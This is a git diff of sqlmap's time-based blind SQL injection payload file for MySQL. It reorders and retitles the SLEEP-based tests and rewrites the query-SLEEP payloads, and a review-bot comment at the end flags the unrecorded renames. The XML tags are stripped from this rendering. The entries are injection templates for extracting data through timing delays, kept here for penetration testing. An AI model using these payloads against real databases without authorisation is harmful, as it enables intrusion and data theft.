diff --git a/lib/core/settings.py b/lib/core/settings.py index b01e30c70..cf42c6c55 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -18,7 +18,7 @@ from lib.core.enums import OS from thirdparty.six import unichr as _unichr # sqlmap version (...) -VERSION = "1.3.5.114" +VERSION = "1.3.5.115" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/xml/payloads/time_blind.xml b/xml/payloads/time_blind.xml index 6423a8050..dc710757e 100644 --- a/xml/payloads/time_blind.xml +++ b/xml/payloads/time_blind.xml @@ -2,98 +2,18 @@ - - MySQL >= 5.0.12 AND time-based blind - 5 - 1 - 1 - 1,2,3,8,9 - 1 - AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - AND SLEEP([SLEEPTIME]) - - - - -
- MySQL - >= 5.0.12 -
-
- - - MySQL >= 5.0.12 OR time-based blind - 5 - 1 - 3 - 1,2,3,9 - 1 - OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - OR SLEEP([SLEEPTIME]) - - - - -
- MySQL - >= 5.0.12 -
-
- - - MySQL >= 5.0.12 AND time-based blind (comment) - 5 - 3 - 1 - 1,2,3,9 - 1 - AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - AND SLEEP([SLEEPTIME]) - # - - - - -
- MySQL - >= 5.0.12 -
-
- - - MySQL >= 5.0.12 OR time-based blind (comment) - 5 - 3 - 3 - 1,2,3,9 - 1 - OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - OR SLEEP([SLEEPTIME]) - # - - - - -
- MySQL - >= 5.0.12 -
-
+ MySQL >= 5.0.12 AND time-based blind (query SLEEP) 5 - 2 + 1 1 1,2,3,8,9 1 - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) @@ -107,13 +27,95 @@ MySQL >= 5.0.12 OR time-based blind (query SLEEP) 5 + 1 + 3 + 1,2,3,9 + 1 + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (SLEEP) + 5 + 2 + 1 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + AND SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (SLEEP) + 5 2 3 1,2,3,9 1 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + OR SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (SLEEP - comment) + 5 + 3 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + AND SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (SLEEP - comment) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + # @@ -131,9 +133,9 @@ 1 1,2,3,9 1 - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) # @@ -152,9 +154,9 @@ 3 1,2,3,9 1 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) # @@ -296,9 +298,9 @@ 1 1,2,3,9 1 - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) @@ -316,9 +318,9 @@ 1 1,2,3,9 1 - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) # @@ -1490,9 +1492,9 @@ 1 1,2,3,9 3 - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
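Review bot: The four plain-SLEEP tests re-added in the `@@ -107,13 +27,95 @@` hunk come back under new titles (`MySQL >= 5.0.12 AND time-based blind (SLEEP)`, the OR variant, and the two `(SLEEP - comment)` ones), and nothing in the commit records the rename. Anything keyed on the old title strings, such as a saved `--test-filter` value or a stored scan baseline used for regression comparison, would stop matching. A comment above the moved block would cover it, for example `<!-- renamed from "MySQL >= 5.0.12 AND time-based blind"; now ordered after the (query SLEEP) variants -->`. The number after the stype `5` also appears to swap between the two AND tests (plain SLEEP 1 to 2, query SLEEP 2 to 1). The element tags are not visible in this rendering, so reading that number as the level field is an assumption, but if it is, the default test selection changes and that deserves a line in the commit message.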